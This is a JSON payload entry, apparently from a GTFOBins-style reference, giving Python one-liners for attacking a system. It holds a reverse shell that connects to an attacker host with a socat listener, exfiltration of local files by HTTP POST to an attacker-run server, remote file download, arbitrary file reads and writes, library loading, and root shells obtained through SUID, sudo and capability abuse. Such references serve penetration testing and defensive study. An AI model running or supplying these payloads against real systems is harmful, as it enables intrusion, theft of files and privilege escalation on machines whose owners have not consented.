{ "description": "The payloads are compatible with both Python version 2 and 3.", "functions": { "shell": [ { "code": "python -c 'import os; os.system(\"/bin/sh\")'" } ], "reverse-shell": [ { "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.", "code": "python -c 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\",[port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n" } ], "file-upload": [ { "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.", "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n" }, { "description": "Serve files in the local folder running an HTTP server.", "code": "python -c 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n" } ], "file-download": [ { "description": "Fetch a remote file via HTTP GET request.", "code": "python -c 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n" } ], "file-write": [ { "code": "python -c 'open(\"[file]\",\"w+\").write(\"DATA\")'" } ], "file-read": [ { "code": "python -c 'print(open(\"[file]\").read())'" } ], "library-load": [ { "code": "python -c 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'" } ], "suid": [ { "code": "./python -c 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'" } ], "sudo": [ { "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'" } ], "capabilities": [ { "code": "./python -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'" } ] } }